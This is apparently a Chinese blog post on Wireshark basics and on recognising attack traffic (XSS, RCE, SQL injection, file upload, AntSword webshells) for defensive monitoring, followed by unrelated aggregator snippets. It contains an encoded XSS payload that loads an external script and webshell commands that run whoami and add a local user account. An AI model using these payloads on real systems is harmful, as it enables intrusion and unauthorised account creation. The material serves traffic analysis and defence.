当前位置：首页 > news >正文

2024HW--＞Wireshark攻击流量分析

news 2025/9/7 13:13:19

在HW中，最离不开的，肯定是看监控了，那么就要去了解一些wireshark的基础用法以及攻击的流量！！！！

1.Wireshark的基本用法

比如人家面试官给你一段流量包，你要会用

1.分组详情

对于我们这里看见的东西，就是分组详情

其中，它把osi分成了五层

网络接口层
数据链路层
网络层
传输层
应用层

2.过滤详情

总的来说，其实过滤规则就是这样的

1.ip的过滤

那么下面，我们来实操一下，比如我想追踪一个为192.168.246.1的ip

ip.addr == 192.168.246.1

但是这样的话，是不是就无法直观的判断它是源还是地址，所以我们就要增加过滤规则

ip.src == 192.168.246.1   //源ip是192.168.246.1
ip.dst == 192.168.246.1   //目的ip是192.168.246.1

2.过滤特定内容

比如如果在打CTF的时候，我们想要去获得包中含有flag的包，那么我们就可以这样做！！！

http contains "flag"

然后我们点击追踪流（这个经常用）

这样的话就能看见一个完整的包了，想招什么自行过滤

如果我们像要对某一个页面的流量进行检测，那么就要这么写

http.request.uri  contains "/pikachu"   //模糊匹配
http.request.uri == "/pikachu"   //精准匹配

3.过滤对应的端口

端口信息存在于传输层，所以我们直接对其过滤就好

tcp.srcport == 80
tpc.dstport == 80

4.过滤请求方式

有的时候，有的是POST有的是GET，还有可能是PUT，所以我们就要去过滤

http.request.method == "POST"
http.request.method == "GET"
http.request.method == "PUT"

3.攻击流量的分析

1.XSS的攻击流量

为了产生XSS的攻击流量，我直接FUZZ了！！！

那就随便逮住一个包来分析一下流量把！！！！

像XSS的流量，一般都是包含什么script alert ，JavaScript这些的

那么怎么判断呢，最简单的，看返回包有咩有对script这样的东西html实体编码

如果是这样的话，大部分就是成功了

再不行的话，还有一种最简单的方法，直接把整个流复制到一个htm的文件里面

并且打开，看一下有没有弹窗，有的话，就是直接弹窗的！！！！！

但是，如果遇到一些逆天的payload呢

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

也不用慌，notepad++走一手，发现是html实体编码，那么我们就要把&#替换为空

然后上python，只用拿前面几个就好，就能大概判断是在XSS

2.RCE流量

对于RCE，其实很好识别，因为基本上都是一些特征的流量

如果能看见这样的话，就基本上是稳了（穿了）

3.SQL注入流量

噢，sql注入，可怕的攻击（hhhhh我没有抄袭）

这个就直接用sqlmap去跑一下就好了

然后我们去看他的流量

看以看见有两个包，直接复制去URL解码，可以看见他是在联合注入

于是再去wireshark里面看内容，可以看见它就是直接被脱了数据库

那如果是别人 --dump呢直接也来看看

看见到了脱库的流量

4.文件上传流量

这个其实很好判断，要么别人就是在FUZZ上传格式，要么就是在尝试解析漏洞，或者最简单，我们直接看他的上传文件的内容

像这种又是php|| jsp ||asp，又是GIF89A，eval，assert还有一些特殊的函数的，稳稳的文件上传

5.Webshell流量

这个就重要了！！！！这个基本上面试必问

像我们常见的蚁剑，c🔪，冰蝎，哥斯拉等等.....我们来看看它的流量

先准备一个木马

然后我们先去试试水，这时候很多小白就会想了？？？不是，是不是我木马没有被解析，怎么没有反应！！！！！

如果你也用这样的疑问，我只能说你对RCE理解的不对！！！

eval是什么函数？？？？是代码执行的函数，ipconfig是代码嘛？？？？？

所以正确的做法应该是这样

cmd=system("whoami /groups");  //这个结尾的分号不要忘了啊

可以看见直接是high，就是说这个最起码是administrator的权限了，直接无视UAC的

不信的话我们可以试一试

cmd=system("net user test hongrisec@2024 /add ");

okay!差不多，扯远了，我们还是来说回蚁剑吧！！！先来测试一下连接的流量

直接看他的包（我这里没有选择编码，于是所有流量都是明文传输）

不要慌，我们用notepad操作一下（URL decode）

好的看不懂，问gpt

所以大概就是干了这么几件事情

先关闭了php的错误显示，并且设置脚本执行时间不限制
然后创建一个隐藏目录
然后写两个函数，其中的一个函数获取缓冲区内容并且输出

然后我们再去看一下它的执行命令时候的流量（有点逆天）

还是来总结一下

通过调用了php的system，passthru，shell_exec这些命令执行函数来构造runcmd这个函数
fe函数用来检验禁用的函数
runshellshock函数检查有没有shellshock这个漏洞（这个Linux漏洞当时真的是非常出名）
然后用回一开始连接的asoutput函数将输出结果返回给用户

但是如果人家蚁剑用的是base64编码呢？？？

我们先去对结果解码一下

md不知道啥玩意，我们'逆向一波"

看见是其中一段是能对上的，我们单独解码那一段，好的，果然是

其实我们看请求包也能看出来，有一个base64的字样

对于蚁剑的流量特征，一般是这样的

@ini_set("display_errors","0"); 如果不经过编码的话，这个就是直接的明文，能看到这个，基本上可以判断是webshell
蚁剑可能使用特定的用户代理字符串，例如“AntSword”或“Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko”等。
混淆加密之后的流量的参数一般是以 0x的形式出现

2024HW--＞Wireshark攻击流量分析

在HW中，最离不开的，肯定是看监控了，那么就要去了解一些wireshark的基础用法以及攻击的流量！！！！ 1.Wireshark的基本用法比如人家面试官给你一段流量包，你要会用 1.分组详情对于我…...

编程日记 2024/4/7 16:22:58

Lafida 数据集 paper：J. Imaging | Free Full-Text | LaFiDa—A Laserscanner Multi-Fisheye Camera Dataset 官网数据：https://www.ipf.kit.edu/english/projekt_cv_szenen.php 官网：KIT-IPF-Software and Datasets - LaFiDa 标定数据下载&…...

编程日记 2024/4/7 16:15:49

excel wps中编码格式转换

EXCEL报表：另存为CSV格式，转换成UTF-8编码 - 简书 (jianshu.com) 经验证管用...

编程日记 2024/4/7 16:14:48

【游戏分析】非游戏领空追字符串来源

通过NPC名称找NPC数组扫描 NPC名字 ASIC型发现全部都有后缀那么采用字节集的方式去扫描也是扫不到说明:不是ASIC型字符串扫描 NPC名字 Unicode型没有结果那么转换成字节集去扫描终于发现结果了把结果挨个修改字符串发现其中两个是可以用的 22和23 …...

编程日记 2024/4/7 16:13:45

golang 数组和切片

区别 1.数组长度固定，切片长度可变 2.数组是深拷贝，切片是浅拷贝，切片是引用类型扩容规则不同版本不一样 https://www.jb51.net/article/280481.htm#_lab2_2_1 go1.18 1.如果期望容量大于当前容量的两倍就会使用期望容量； 2.如…...

编程日记 2024/4/7 16:12:44

物联网实战--入门篇之(九)安卓QT--开发框架

目录一、QT简介二、开发环境三、编码风格四、设计框架五、总结一、QT简介 QT是一款以C为基础的开发工具，已经包含了很多常用的库，除了基本的GUI以外，还有网络、数据库、多媒体、进程通信、串口、蓝牙等常用库，开发起来…...

编程日记 2024/4/7 16:11:43

【leetcode面试经典150题】16.接雨水（C++）

【leetcode面试经典150题】专栏系列将为准备暑期实习生以及秋招的同学们提高在面试时的经典面试算法题的思路和想法。本专栏将以一题多解和精简算法思路为主，题解使用C语言。（若有使用其他语言的同学也可了解题解思路，本质上语法内容一致&…...

编程日记 2024/4/7 16:08:40

互联网面经

腾讯视频代码：反转链表，单例模式 RAII,哪里用到 Web服务器怎样处理请求 get\post流程项目使用的还是http1.0吗；http2.0：二进制、首部压缩、主动推送；Https Epoll/select/poll ET/LT 进程地址空间。3…...

编程日记 2024/4/7 16:07:38

xss介绍及作用

XSS（Cross-Site Scripting）是一种常见的网络安全漏洞，它允许攻击者向网站注入恶意的客户端脚本代码，从而在用户的浏览器中执行这些代码。 XSS攻击的原理是攻击者将恶意脚本插入到网页中的用户输入数据中，当其他用户访…...

编程日记 2024/4/7 16:03:34

PostgreSQL入门到实战-第二弹

PostgreSQL入门到实战 PostgreSQL安装之Windows官网地址PostgreSQL概述Windows上安装PostgreSQL更新计划 PostgreSQL安装之Windows 官网地址声明: 由于操作系统, 版本更新等原因, 文章所列内容不一定100%复现, 还要以官方信息为准 https://www.postgresql.org/PostgreSQL概…...

编程日记 2024/4/7 15:59:30

3-【PS让图片动起来】系列1-【导入素材】

【问题介绍】仅做图片，现在很难吸引用户视线，越来越多地图片需要动起来增添意境，比如春日樱花花瓣掉落、冬季雪花纷纷，今天来学学怎么用PS的时间轴，让图片动起来~ 如下图，一副冬日雪景图，想给画…...

编程日记 2024/4/7 15:57:26

基于Java+SpringBoot+Mybaties+layui+Vue+elememt 实习管理系统的设计与实现

一.项目介绍前台功能：用户进入系统可以实现首页，系统公告，个人中心，后台管理等功能进行操作后台由管理员，实习单位，教师和学生，主要功能包括首页，个人中心，班级管理&am…...

编程日记 2024/4/7 15:56:24

非关系型数据库——Redis基本操作

目录一、Redis数据库常用命令 1.Set——存放数据 2.Get——获取数据 3.Keys——获取符合条件的键值 4.Exists——判断键值是否存在 5.Del——删除指定键值 6.Type——获取键值对应的类型 7.Rename——对已有键值重命名（覆盖） 8.Renamenx——对…...

编程日记 2024/4/7 15:55:23

golang语言和JAVA对比

引言：在当今的软件开发领域，有许多编程语言供开发人员选择。其中，Golang和Java是两种备受开发者青睐的语言。本文将探讨Golang和Java之间的比较和对比，分析它们在语言特性、性能、平台支持、社区和生态系统、开发效率和可维护性等方面的异同。一、语言特性和性能 Golang…...

编程日记 2024/4/7 15:53:21

隐私计算实训营学习九：隐语多方安全计算在安全核对的行业实践

文章目录一、业务背景：安全核对产生的土壤二、产品方案：从试点到规模化的路三、技术共建：与隐语的共同成长一、业务背景：安全核对产生的土壤业务背景：很多粗放使用数据的方式被新出台的法律法规所规范，…...

编程日记 2024/4/7 15:51:19

C#实现只保存2天的日志文件

文章目录业务需求代码运行效果欢迎讨论！ 业务需求在生产环境中，控制台窗口不便展示出来。为了在生产环境中，完整记录控制台应用的输出，选择将其输出到文件中。但是，存储所有输出的话会占用很多空间，…...

编程日记 2024/4/7 15:50:17

C++ 类和对象（中篇）

类的6个默认成员函数如果一个类中什么成员都没有，简称为空类。空类中什么都没有吗？并不是的，任何一个类在我们不写的情况下，都会自动生成下面6个默认成员函数。构造函数： 定义：构造函数是一个特殊的成员…...

编程日记 2024/4/7 15:45:12

可视化场景（9）：智慧看板，可能是最直观的数据展示

10年经验的大数据可视化和数字孪生老司机，该领域的专家，是您可信赖的技术合伙人，分享该领域的项目和作品，欢迎互动交流。 hello，我是贝格前端工场，本期分享可视化大屏在安全生产与设备运维场景的应用&#…...

编程日记 2024/4/7 15:44:09

加密算法（二）

1、SHA-256加密算法： package com.arithmetic.encryption; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; //使用java.security.MessageDigest类来进行SHA-256摘要的计算。 //通过getInstance("SHA-256")方法获取…...

编程日记 2024/4/7 15:42:07

大创项目推荐深度学习 YOLO 实现车牌识别算法

文章目录 0 前言1 课题介绍2 算法简介2.1网络架构 3 数据准备4 模型训练5 实现效果5.1 图片识别效果5.2视频识别效果 6 部分关键代码7 最后 0 前言 🔥 优质竞赛项目系列，今天要分享的是 🚩 基于yolov5的深度学习车牌识别系统实现该项目较…...

编程日记 2024/4/7 15:40:05

深入剖析AI大模型：大模型时代的 Prompt 工程全解析

今天聊的内容，我认为是AI开发里面非常重要的内容。它在AI开发里无处不在，当你对 AI 助手说 "用李白的风格写一首关于人工智能的诗"，或者让翻译模型 "将这段合同翻译成商务日语" 时，输入的这句话就是 Prompt。…...

编程新知 2025/9/2 17:00:17

从WWDC看苹果产品发展的规律

WWDC 是苹果公司一年一度面向全球开发者的盛会，其主题演讲展现了苹果在产品设计、技术路线、用户体验和生态系统构建上的核心理念与演进脉络。我们借助 ChatGPT Deep Research 工具，对过去十年 WWDC 主题演讲内容进行了系统化分析，形成了这份…...

编程新知 2025/9/4 19:50:14

Qt Widget类解析与代码注释

#include "widget.h" #include "ui_widget.h"Widget::Widget(QWidget *parent): QWidget(parent), ui(new Ui::Widget) {ui->setupUi(this); }Widget::~Widget() {delete ui; }//解释这串代码，写上注释当然可以！这段代码是 Qt …...

编程新知 2025/6/15 21:47:30